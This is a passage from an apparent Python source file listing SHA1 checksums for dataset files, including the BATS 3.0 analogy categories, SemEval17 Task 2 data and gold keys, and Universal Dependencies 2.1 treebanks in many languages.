'BATS_3.0/2_Derivational_morphology/D02 [un+adj_reg].txt':\n '80b82227a0d5f7377f1e8cebe28c582bfeb1afb5',\n 'BATS_3.0/2_Derivational_morphology/D03 [adj+ly_reg].txt':\n '223e120bd61b3116298a253f392654c15ad5a39a',\n 'BATS_3.0/2_Derivational_morphology/D04 [over+adj_reg].txt':\n 'a56f8685af489bcd09c36f864eba1657ce0a7c28',\n 'BATS_3.0/2_Derivational_morphology/D05 [adj+ness_reg].txt':\n '5da99b1f1781ecfb4a1a7448c715abf07451917b',\n 'BATS_3.0/2_Derivational_morphology/D06 [re+verb_reg].txt':\n '4c5e1796091fade503fbf0bfc2fae2c7f98b5dd2',\n 'BATS_3.0/2_Derivational_morphology/D07 [verb+able_reg].txt':\n 'a6218162bc257d98e875fc667c23edfac59e19fd',\n 'BATS_3.0/2_Derivational_morphology/D08 [verb+er_irreg].txt':\n '9a4236c3bbc23903e101a42fb5ad6e15e552fadf',\n 'BATS_3.0/2_Derivational_morphology/D09 [verb+tion_irreg].txt':\n '3ab0153926d5cf890cf08a4077da6d9946133874',\n 'BATS_3.0/2_Derivational_morphology/D10 [verb+ment_irreg].txt':\n '2a012b87a9a60e128e064c5fe24b60f99e16ddce',\n 'BATS_3.0/3_Encyclopedic_semantics/E01 [country - capital].txt':\n '9890315d3c4e6a38b8ae5fc441858564be3d3dc4',\n 'BATS_3.0/3_Encyclopedic_semantics/E02 [country - language].txt':\n 'ef08a00e8ff7802811ace8f00fabac41b5d03678',\n 'BATS_3.0/3_Encyclopedic_semantics/E03 [UK_city - county].txt':\n '754957101c93a25b438785bd4458404cd9010259',\n 'BATS_3.0/3_Encyclopedic_semantics/E04 [name - nationality].txt':\n '71a6562c34fb6154992a7c3e499375fcc3529c96',\n 'BATS_3.0/3_Encyclopedic_semantics/E05 [name - occupation].txt':\n 'a9a6f9f1af959aef83106f3dbd6bed16dfe9a3ea',\n 'BATS_3.0/3_Encyclopedic_semantics/E06 [animal - young].txt':\n '12d5b51c7b76b9136eadc719abc8cf4806c67b73',\n 'BATS_3.0/3_Encyclopedic_semantics/E07 [animal - sound].txt':\n '91991b007a35f45bd42bd7d0d465c6f8311df911',\n 'BATS_3.0/3_Encyclopedic_semantics/E08 [animal - shelter].txt':\n 'e5af11e216db392986ba0cbb597d861066c29adb',\n 'BATS_3.0/3_Encyclopedic_semantics/E09 [things - color].txt':\n 'd30b2eb2fc7a60f19afda7c54582e30f6fe28f51',\n 'BATS_3.0/3_Encyclopedic_semantics/E10 [male - female].txt':\n '247a588671bc1da8f615e14076bd42573d24b4b3',\n 'BATS_3.0/4_Lexicographic_semantics/L01 [hypernyms - animals].txt':\n '4b5c4dabe2c9c038fafee85d8d3958f1b1dec987',\n 'BATS_3.0/4_Lexicographic_semantics/L02 [hypernyms - misc].txt':\n '83d5ecad78d9de28fd70347731c7ee5918ba43c9',\n 'BATS_3.0/4_Lexicographic_semantics/L03 [hyponyms - misc].txt':\n 'a8319856ae2f76b4d4c030ac7e899bb3a06a9a48',\n 'BATS_3.0/4_Lexicographic_semantics/L04 [meronyms - substance].txt':\n 'c081e1104e1b40725063f4b39d13d1ec12496bfd',\n 'BATS_3.0/4_Lexicographic_semantics/L05 [meronyms - member].txt':\n 'bcbf05f3be76cef990a74674a9999a0bb9790a07',\n 'BATS_3.0/4_Lexicographic_semantics/L06 [meronyms - part].txt':\n '2f9bdcc74b881e1c54b391c9a6e7ea6243b3accc',\n 'BATS_3.0/4_Lexicographic_semantics/L07 [synonyms - intensity].txt':\n '8fa287860b096bef004fe0f6557e4f686e3da81a',\n 'BATS_3.0/4_Lexicographic_semantics/L08 [synonyms - exact].txt':\n 'a17c591961bddefd97ae5df71f9d1559ce7900f4',\n 'BATS_3.0/4_Lexicographic_semantics/L09 [antonyms - gradable].txt':\n '117fbb86504c192b33a5469f2f282e741d9c016d',\n 'BATS_3.0/4_Lexicographic_semantics/L10 [antonyms - binary].txt':\n '3cde2f2c2a0606777b8d7d11d099f316416a7224'}\nBATS_CATEGORIES = {'I01': '[noun - plural_reg]', 'I02':\n '[noun - plural_irreg]', 'I03': '[adj - comparative]', 'I04':\n '[adj - superlative]', 'I05': '[verb_inf - 3pSg]', 'I06':\n '[verb_inf - Ving]', 'I07': '[verb_inf - Ved]', 'I08':\n '[verb_Ving - 3pSg]', 'I09': '[verb_Ving - Ved]', 'I10':\n '[verb_3pSg - Ved]', 'D01': '[noun+less_reg]', 'D02': '[un+adj_reg]',\n 'D03': '[adj+ly_reg]', 'D04': '[over+adj_reg]', 'D05': '[adj+ness_reg]',\n 'D06': '[re+verb_reg]', 'D07': '[verb+able_reg]', 'D08':\n '[verb+er_irreg]', 'D09': '[verb+tion_irreg]', 'D10':\n '[verb+ment_irreg]', 'E01': '[country - capital]', 'E02':\n '[country - language]', 'E03': '[UK_city - county]', 'E04':\n '[name - nationality]', 'E05': '[name - occupation]', 'E06':\n '[animal - young]', 'E07': '[animal - sound]', 'E08':\n '[animal - shelter]', 'E09': '[things - color]', 'E10':\n '[male - female]', 'L01': '[hypernyms - animals]', 'L02':\n '[hypernyms - misc]', 'L03': '[hyponyms - misc]', 'L04':\n '[meronyms - substance]', 'L05': '[meronyms - member]', 'L06':\n '[meronyms - part]', 'L07': '[synonyms - intensity]', 'L08':\n '[synonyms - exact]', 'L09': '[antonyms - gradable]', 'L10':\n '[antonyms - binary]'}\nSEMEVAL17_CHECKSUMS = {'SemEval17-Task2/README.txt':\n 'ad02d4c22fff8a39c9e89a92ba449ec78750af6b',\n 'SemEval17-Task2/task2-scorer.jar':\n '145ef73ce955656d59e3b67b41f8152e8ee018d8',\n 'SemEval17-Task2/test/subtask1-monolingual/data/de.test.data.txt':\n '6fc840f989d2274509549e472a68fb88dd2e149f',\n 'SemEval17-Task2/test/subtask1-monolingual/data/en.test.data.txt':\n '05293fcbd80b2f4aad9b6518ce1a546ad8f61f33',\n 'SemEval17-Task2/test/subtask1-monolingual/data/es.test.data.txt':\n '552904b5988f9951311290ca8fa0441dd4351d4b',\n 'SemEval17-Task2/test/subtask1-monolingual/data/fa.test.data.txt':\n '29d5970feac5982961bd6ab621ba31f83d3bff77',\n 'SemEval17-Task2/test/subtask1-monolingual/data/it.test.data.txt':\n 'c95fe2be8fab37e9c70610117bdedc48a0a8e95c',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/de.test.gold.txt':\n 'c51463460495a242cc726d41713c5e00b66fdd18',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/en.test.gold.txt':\n '2d2bb2ed41308cc60e7953cc9036f7dc89141b48',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/es.test.gold.txt':\n 'a5842ff17fe3847d15414924826a8eb236018bcc',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/fa.test.gold.txt':\n '717bbe035d8ae2bad59416eb3dd4feb7238b97d4',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/it.test.gold.txt':\n 'a342b950109c73afdc86a7829e17c1d8f7c482f0',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-es.test.data.txt':\n 'ef92b1375762f68c700e050d214d3241ccde2319',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-fa.test.data.txt':\n '17aa103981f3193960309bb9b4cc151acaf8136c',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-it.test.data.txt':\n 'eced15e8565689dd67605a82a782d19ee846222a',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-de.test.data.txt':\n '5cb69370a46385a7a3d37cdf2018744be77203a0',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-es.test.data.txt':\n '402f7fed52b60e915fb1be49f935395488cf7a7b',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-fa.test.data.txt':\n '9bdddbbde3da755f2a700bddfc3ed1cd9324ad48',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-it.test.data.txt':\n 'd3b37aac79ca10311352309ef9b172f686ecbb80',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/es-fa.test.data.txt':\n 'a2959aec346c26475a4a6ad4d950ee0545f2381e',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/es-it.test.data.txt':\n 'ca627c30143d9f82a37a8776fabf2cee226dd35c',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/it-fa.test.data.txt':\n 'a03d79a6ce7b798356b53b4e85dbe828247b97ef',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-es.test.gold.txt':\n '7564130011d38daad582b83135010a2a58796df6',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-fa.test.gold.txt':\n 'c9e23c2e5e970e7f95550fbac3362d85b82cc569',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-it.test.gold.txt':\n 'b74cc2609b2bd2ceb5e076f504882a2e0a996a3c',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-de.test.gold.txt':\n '428dfdad2a144642c13c24b845e6b7de6bf5f663',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-es.test.gold.txt':\n '1dd7ab08a10552486299151cdd32ed19b56db682',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-fa.test.gold.txt':\n '17451ac2165aa9b695dae9b1aba20eb8609fb400',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-it.test.gold.txt':\n '5041c0b84a603ed85aa0a5cbe4b1c34f69a2fa7c',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/es-fa.test.gold.txt':\n '8c09a219670dc32ab3864078bf0c28a287accabc',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/es-it.test.gold.txt':\n 'b1cdd13209354cc2fc2f4226c80aaa85558daf4a',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/it-fa.test.gold.txt':\n 'e0b560bb1d2db39ce45e841c8aad611734dc94f1',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/de.trial.data.txt':\n 'dd071fd90f59bec8d271a447d86ee2e462941f52',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/en.trial.data.txt':\n 'e8e5add0850b3dec07f102be26b8791a5e9bbbcf',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/es.trial.data.txt':\n '8956c78ff9ceae1d923a57816e55392c6a7dfc49',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/fa.trial.data.txt':\n '2f7c4247cde0d918b3508e90f6b49a1f5031c81b',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/it.trial.data.txt':\n 'c11e0b5b55f94fc97c7b11fa455e71b071be879f',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/de.trial.gold.txt':\n 'ce5567b1accf3eb07da53229dfcb2a8a1dfac380',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/en.trial.gold.txt':\n '693cb5928e807c79e39136dc0981dadca7832ae6',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/es.trial.gold.txt':\n '8241ca66bf5ba55f77607e9bcfae8e34902715d8',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/fa.trial.gold.txt':\n 'd30701a93c8c5500b82ac2334ed8410f9a23864b',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/it.trial.gold.txt':\n 'bad225573e1216ba8b35429e9fa520a20e8ce031',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/de.trial.sample.output.txt'\n : 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/en.trial.sample.output.txt'\n : 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/es.trial.sample.output.txt'\n : 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/fa.trial.sample.output.txt'\n : 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/it.trial.sample.output.txt'\n : 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-es.trial.data.txt':\n 'c27c8977d8d4434fdc3e59a7b0121d87e0a03237',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-fa.trial.data.txt':\n '88a6f6dd1bba309f7cae7281405e37f442782983',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-it.trial.data.txt':\n 'ebdab0859f3b349fa0120fc8ab98be3394f0d73d',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-de.trial.data.txt':\n '128d1a460fe9836b66f0fcdf59455b02edb9f258',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-es.trial.data.txt':\n '508c5dde8ffcc32ee3009a0d020c7c96a338e1d1',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-fa.trial.data.txt':\n '1a3640eb5facfe15b1e23a07183a2e62ed80c7d9',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-it.trial.data.txt':\n '141c83d591b0292016583d9c23a2cc5514a006aa',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/es-fa.trial.data.txt':\n 'a0a548cd698c389ee80c34d6ec72abed5f1625e5',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/es-it.trial.data.txt':\n '8d42bed8a43ff93d26ca95794758d9392ca707ed',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/it-fa.trial.data.txt':\n '9c85223f1f734de61c28157df0ce417bb0537803',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-es.trial.gold.txt':\n '126c92b2fb3b8f2784dd4ae2a4c52b02a87a8196',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-fa.trial.gold.txt':\n '1db6201c2c8f19744c39dbde8bd4a803859d64c1',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-it.trial.gold.txt':\n '5300bf2ead163ff3981fb41ec5d0e291c287c9e0',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-de.trial.gold.txt':\n 'd4f5205de929bb0c4020e1502a3f2204b5accd51',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-es.trial.gold.txt':\n '3237e11c3a0d9c0f5d583f8dc1d025b97a1f8bfe',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-fa.trial.gold.txt':\n 'c14de7bf326907336a02d499c9b92ab229f3f4f8',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-it.trial.gold.txt':\n '3c0276c4b4e7a6d8a618bbe1ab0f30ad7b07929c',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-fa.trial.gold.txt':\n '359f69e9dfd6411a936baa3392b8f05c398a7707',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-it.trial.gold.txt':\n '44090607fabe5a26926a384e521ef1317f6f00d0',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/it-fa.trial.gold.txt':\n '97b09ffa11803023c2143fd4a4ac4bbc9775e645',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-es.trial.sample.output.txt'\n : 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-fa.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-it.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-de.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-es.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-fa.trial.sample.output.txt'\n : 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-it.trial.sample.output.txt'\n : 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/es-fa.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/es-it.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/it-fa.trial.sample.output.txt'\n : 'a0735361a692be357963959728dacef85ea08240'}\nUD21_DATA_FILE_SHA1 = {'af': {'dev': ('af-ud-dev.conllu',\n 'e37b104f4425ee00afc81779201816d5ac525194'), 'test': (\n 'af-ud-test.conllu', 'd2bf02370d308ee957c04242bd0871db0e488389'),\n 'train': ('af-ud-train.conllu',\n 'a652c7b19c236063d3ea489947f83095893b699a')}, 'grc_proiel': {'dev': (\n 'grc_proiel-ud-dev.conllu', 'd199530c7e40ff0214e510957bb126af0dc12c1c'),\n 'test': ('grc_proiel-ud-test.conllu',\n 'bb7825ddeb18fc2d86638e4725f04563f3e08aab'), 'train': (\n 'grc_proiel-ud-train.conllu',\n 'fe6c861299b033abe8c4ce2b6131cd74f87b96a7')}, 'grc': {'dev': (\n 'grc-ud-dev.conllu', 'debdfec0272cd558ccd29fe0ae2f13175dd20a33'),\n 'test': ('grc-ud-test.conllu',\n 'f19accf31db95e2c736d716d3438c09aa877eb07'), 'train': (\n 'grc-ud-train.conllu', 'e98d3eabea67787c5d43a498f5a0fa4246f38104')},\n 'ar_nyuad': {'dev': ('ar_nyuad-ud-dev.conllu',\n 'b740de9bd68e68b30b9b313eb050d44e94470ca5'), 'test': (\n 'ar_nyuad-ud-test.conllu', 'f5d5b8979b7fedd76235d4bae77e0b4a7b0a750a'),\n 'train': ('ar_nyuad-ud-train.conllu',\n 'd065f03958fd8782a7431b6778c6665ad09444a6')}, 'ar_pud': {'test': (\n 'ar_pud-ud-test.conllu', '2161701e6726b6feb14733a312fba6160b9eb722')},\n 'ar': {'dev': ('ar-ud-dev.conllu',\n '5f8964974d5ba5eb3504cdafb93c34c473c4177c'), 'test': (\n 'ar-ud-test.conllu', '58df161047f310cc3bb4d0e615ca33466e630bb9'),\n 'train': ('ar-ud-train.conllu',\n '0a3d5cefa1fecd6a74f2016ee73ea7a7a02eb359')}, 'eu': {'dev': (\n 'eu-ud-dev.conllu', '3ee15b5ed46ec93d7278c8cc0351d242417d553d'), 'test':\n ('eu-ud-test.conllu', 'aa68d6442ac6dc1abedc19c1b98c4a9944786188'),\n 'train': ('eu-ud-train.conllu',\n 'd56ec997916e38ee6ab1badd78c119e81e4797c9')}, 'be': {'dev': (\n 'be-ud-dev.conllu', '015473e91cf8937c46e8b721f206415abac16a35'), 'test':\n ('be-ud-test.conllu', 'f009ea1885f54cfd77fca8a2c89133b2af8f9f5e'),\n 'train': ('be-ud-train.conllu',\n '26b871e28d2f356a709f106b6e3e86b417ba74e7')}, 'bg': {'dev': (\n 'bg-ud-dev.conllu', '0a2284b10547681eb65691eb2a9f0f1662e16e90'), 'test':\n ('bg-ud-test.conllu', '75ea2a5e1d55bb57efecae6ec2b5ac3cc1b37e57'),\n 'train': ('bg-ud-train.conllu',\n 'd4b2fa267010c4486885c91f3af65ff66c8be94c')}, 'bxr': {'sample': (\n 'bxr-ud-sample.conllu', '9239bdd251a60820c71111ec54de9e7d58a8579d'),\n 'test': ('bxr-ud-test.conllu',\n '0a06e527454ae0b547153222f67eb5db94e528fd')}, 'yue': {'test': (\n 'yue-ud-test.conllu', 'd91477c65aa75cd45489cca13f7a122066972bdb')},\n 'ca': {'dev': ('ca-ud-dev.conllu',\n '5737824f0afff0d07a43db331f102d62c6da2d96'), 'test': (\n 'ca-ud-test.conllu', '0e28bd2a3b982515c1158194ad52bcbbe741e170'),\n 'train': ('ca-ud-train.conllu',\n 'b5ff2392722d4a1df3bfc52fa5b8f2043b7aec0c')}, 'zh_cfl': {'test': (\n 'zh_cfl-ud-test.conllu', '32fe45cd0e4e11ced95202971bce74acbc6a8c30')},\n 'zh_hk': {'test': ('zh_hk-ud-test.conllu',\n '4c75fa5bbcdcb181447b4e037224d50feb2776fb')}, 'zh_pud': {'test': (\n 'zh_pud-ud-test.conllu', 'b3e448884b7b6229379f9723b97c6e9a6fedcb61')},\n 'zh': {'dev': ('zh-ud-dev.conllu',\n '34d8253b35ad2245d59ddffa71b5689ef267b6b2'), 'test': (\n 'zh-ud-test.conllu', '0f00516097650c12262298dd0fbd1b17a6d2bfe2'),\n 'train': ('zh-ud-train.conllu',\n '9444eec5f4561f289ad140e47e49013689512a65')}, 'cop': {'dev': (\n 'cop-ud-dev.conllu', '863d1004df1a92df52515105f6fae6ff68539595'),\n 'test': ('cop-ud-test.conllu',\n 'd3b33566679f071d4ad622ad840cd98381835706'), 'train': (\n 'cop-ud-train.conllu', '33d0e5de5d6077f7c52a4cd90bce0047f3e9ff6f')},\n 'hr': {'dev': ('hr-ud-dev.conllu',\n '8da2a419980807d2e91e09b6bf496e58d442b0ba'), 'test': (\n 'hr-ud-test.conllu', '49d673cba3d32d39d413e557276a45a0214ed83e'),\n 'train': ('hr-ud-train.conllu',\n 'e5cc686bb46c80c84c3ac60ed459e1f124c04c08')}, 'cs_cac': {'dev': (\n 'cs_cac-ud-dev.conllu', '69dfed28c29146b41a3428f4715bde70a6aecf00'),\n 'test': ('cs_cac-ud-test.conllu',\n 'a994b33ebbde486c1818a9df460fb112055e95de'), 'train': (\n 'cs_cac-ud-train.conllu', '694f8559471dc481612606bf5df078daa094a84e')},\n 'cs_cltt': {'dev': ('cs_cltt-ud-dev.conllu',\n 'f35d5dbe57cd95760901ea29de4f493d5d2a44d4'), 'test': (\n 'cs_cltt-ud-test.conllu', 'a8f6696785e658471f759bc736b738a105cba9a3'),\n 'train': ('cs_cltt-ud-train.conllu',\n 'ab97886066bfa462e5da03d25f802489292c0b56')}, 'cs_fictree': {'dev': (\n 'cs_fictree-ud-dev.conllu', 'dc67c07737a3a8bf2633068941f2d55f1500e192'),\n 'test': ('cs_fictree-ud-test.conllu',\n '06becaedef1cfdb8e1b2dce3f0d3a3a607d178a4'), 'train': (\n 'cs_fictree-ud-train.conllu',\n 'fe7dbe3a0e6ee73e19e788c43bbb8f8f47ae1645')}, 'cs_pud': {'test': (\n 'cs_pud-ud-test.conllu', '9f205677041de694157ba2ef3e1eadb44d467f2f')},\n 'cs': {'dev': ('cs-ud-dev.conllu',\n 'd609e895b21b8710337e23a98b58ffd7b7a54bf1'), 'test': (\n 'cs-ud-test.conllu', '34091286a11b1ce2a9c8bcfa03fdd86fb0e13965'),\n 'train': ('cs-ud-train.conllu',\n 'd1f855798a29d433b580d01ade0d8d062cd58534')}, 'da': {'dev': (\n 'da-ud-dev.conllu', '2c0c798c20a2efb30273172d388342a82bb0ce3c'), 'test':\n ('da-ud-test.conllu', '85a95a8527f8773f1575ceaf0ab51f204b211047'),\n 'train': ('da-ud-train.conllu',\n 'b653c029a7ae5c106f865dcef949fb3fe2aa0420')}, 'nl_lassysmall': {'dev':\n ('nl_lassysmall-ud-dev.conllu',\n '2a169af74c2206c9073c3932b4a300492a314ee5'), 'test': (\n 'nl_lassysmall-ud-test.conllu',\n '39f08896a40ad370f2acc37d58689cdc43a660a9'), 'train': (\n 'nl_lassysmall-ud-train.conllu',\n 'e4fd6bac246c81bb17a3c932e251b8662739cc19')}, 'nl': {'dev': (\n 'nl-ud-dev.conllu', '33a9387eef9f5c0b15bd1e76e78776863f1f6d90'), 'test':\n ('nl-ud-test.conllu', '01b3e1048792c851fdd59882c353fcdb76dc165e'),\n 'train': ('nl-ud-train.conllu',\n '8e6a10152b7d09ce61433dd5f715ab2401611cf6')}, 'en_lines': {'dev': (\n 'en_lines-ud-dev.conllu', '83b63b7670ea4394b558bc26e16a004339f0a0ef'),\n 'test': ('en_lines-ud-test.conllu',\n 'ccc9d3c71a873313d138c3adb12405a97eb270d8'), 'train': (\n 'en_lines-ud-train.conllu', 'da42bfac9fd97d98ebbbc37c65d83ff4c53b4e79')\n }, 'en_pud': {'test': ('en_pud-ud-test.conllu',\n '4a9c83ba058a7e51979af790ba0440cc274b948f')}, 'en_partut': {'dev': (\n 'en_partut-ud-dev.conllu', '863a6f571158acaaca95223e50bd08fc0c1134f0'),\n 'test': ('en_partut-ud-test.conllu',\n '0c0780b0f14e4623f1014e6496d639cd2d2f6ffd'), 'train': (\n 'en_partut-ud-train.conllu', 'e00a2d6f7efa28c8aaa40dccdf29b59a50f48e18'\n )}, 'en': {'dev': ('en-ud-dev.conllu',\n 'e2159dda4400d289ad8a403b466c8d23d733ba35'), 'test': (\n 'en-ud-test.conllu', 'bd36ef23f76155625b379d063427bd62f19b7658'),\n 'train': ('en-ud-train.conllu',\n '993c44f62104971fe2d056847349facbb7986258')}, 'et': {'dev': (\n 'et-ud-dev.conllu', '312f9477f7ee1dd380c1fbcf77a6f0c63476fdbb'), 'test':\n ('et-ud-test.conllu', 'd70907f0771b41a27406672b9d91043a0954f946'),\n 'train': ('et-ud-train.conllu',\n 'b6d788e7a3362d0984d1cff06c1ba3d66f6bf773')}, 'fi_ftb': {'dev': (\n 'fi_ftb-ud-dev.conllu', '552ec574acdb3209e7545af4e16a43a1e2956979'),\n 'test': ('fi_ftb-ud-test.conllu',\n '13c34838a0fa9e379f9624ed1f4c368ca50a7d98'), 'train': (\n 'fi_ftb-ud-train.conllu', '73d025250bfc82a24181b5ed601dc4ae7c8e846c')},\n 'fi_pud': {'test': ('fi_pud-ud-test.conllu',\n '4ab7b0d99ce6697d79732e401be97585a28c2afa')}, 'fi': {'dev': (\n 'fi-ud-dev.conllu', 'e023cf7eaffbda20bd4518d87fe9086207bb5361'), 'test':\n ('fi-ud-test.conllu', 'fd57c5106e43994250f4472890572bdbb8b4a48b'),\n 'train': ('fi-ud-train.conllu',\n 'ab27bda8cbb62886196b78de87985a4c6cf8215d')}, 'fr_ftb': {'dev': (\n 'fr_ftb-ud-dev.conllu', '71b3cc02601f64711f98e33a6b2af10aa00700be'),\n 'test': ('fr_ftb-ud-test.conllu',\n '723b8c44e74202a18b7e71268b738a5e1aa15f86'), 'train': (\n 'fr_ftb-ud-train.conllu', '9a347120478254647deb7c7e02871b28aad23ec4')},\n 'fr_pud': {'test': ('fr_pud-ud-test.conllu',\n '570b7e31dc359ed62123bea6546efa13cfc2cf25')}, 'fr_partut': {'dev': (\n 'fr_partut-ud-dev.conllu', '1505030048829a8dccc466cc86bca057996301ae'),\n 'test': ('fr_partut-ud-test.conllu',\n 'f6446317c9f82cc0b70a76be75282804a3359ac0'), 'train': (\n 'fr_partut-ud-train.conllu', 'f87c246cfa91186b90c7780cb64783034f196622'\n )}, 'fr_sequoia': {'dev': ('fr_sequoia-ud-dev.conllu',\n '859b10d80c7b3a382571cce9b2620039673539d1'), 'test': (\n 'fr_sequoia-ud-test.conllu', 'be0ef69e392e64030414748da2995433f23e033d'\n ), 'train': ('fr_sequoia-ud-train.conllu',\n '48ac01913518888a32670a687123ed1bac57e0e9')}, 'fr': {'dev': (\n 'fr-ud-dev.conllu', '5de0aee778bcc69d14285ada88f0ff7e5ac0a0cd'), 'test':\n ('fr-ud-test.conllu', 'd20a014acd38193155a33a5233c13f89541c78c3'),\n 'train': ('fr-ud-train.conllu',\n 'feee0cc85a2d7dcb3397399ef22c8af8ef75420b')}, 'gl_treegal': {'dev': (\n 'gl_treegal-ud-dev.conllu', '272558614cff4a5e1f2805626904e6dc488b8d25'),\n 'test': ('gl_treegal-ud-test.conllu',\n '18d99474d3aa9c83878c42a79d7881330dd9b861'), 'train': (\n 'gl_treegal-ud-train.conllu',\n 'b1691dd5f587a19eb9dc6f141ecbd3eec3bb0e07')}, 'gl': {'dev': (\n 'gl-ud-dev.conllu', 'e72390dce9bf973442deef31ed0cd7a975361fe5'), 'test':\n ('gl-ud-test.conllu', '7d82ba3672bd4427674428e1dcbcae4feebc3aeb'),\n 'train': ('gl-ud-train.conllu',\n 'd586e7bffa314f8c5b85288e060e68dddc1f5d33')}, 'de_pud': {'test': (\n 'de_pud-ud-test.conllu', '2c91e42b7345145290b68385ff5270910048b8c4')},\n 'de': {'dev': ('de-ud-dev.conllu',\n '9b4f49bfa2b609d54369890d9e7d8d24a3c229af'), 'test': (\n 'de-ud-test.conllu', '48f0f6f98b38710906481b5e9fe1d459d28f1b4a'),\n 'train': ('de-ud-train.conllu',\n '04a1d6a6a2da9d9c38496118e0432c9a6720db64')}, 'got': {'dev': (\n 'got-ud-dev.conllu', '501c47193ca2af5826e4afcc04941df87a7c47c3'),\n 'test': ('got-ud-test.conllu',\n 'cfcf16d562434987562bd1f5faa0d8c007e9ddb8'), 'train': (\n 'got-ud-train.conllu', 'b4951ede89d947c6617df782ac248566235f78fb')},\n 'el': {'dev': ('el-ud-dev.conllu',\n '9df0919ed6f9dcab3ba3f60f0ad31d0c79ae6cdb'), 'test': (\n 'el-ud-test.conllu', '1bb4a6b24521f0c3c7d6cf71e2456ef3a1ee31aa'),\n 'train': ('el-ud-train.conllu',\n '32f4abc821624c4cd4d3b3b555c1558f06366e2c')}, 'he': {'dev': (\n 'he-ud-dev.conllu', 'c5b76874fcf11c7733e1555957bb49e8298af140'), 'test':\n ('he-ud-test.conllu', '4fbe4115948250fc2e42dd43399d1c6c11ddcfd2'),\n 'train': ('he-ud-train.conllu',\n 'eae49a515b38d224b109138bf006a112e80a7caf')}, 'hi_pud': {'test': (\n 'hi_pud-ud-test.conllu', 'd237fecc594186e7a52ad33313ac52e927905d73')},\n 'hi': {'dev': ('hi-ud-dev.conllu',\n '48b592bb1aa1cbc30d41d2913421cfd3f9d2c790'), 'test': (\n 'hi-ud-test.conllu', '004a7fdde368f32f9f230bc5e2cf4ce9e1d8f8d7'),\n 'train': ('hi-ud-train.conllu',\n '9be8afb2cabda361817c55b3de6ebba2c3fef7e0')}, 'hu': 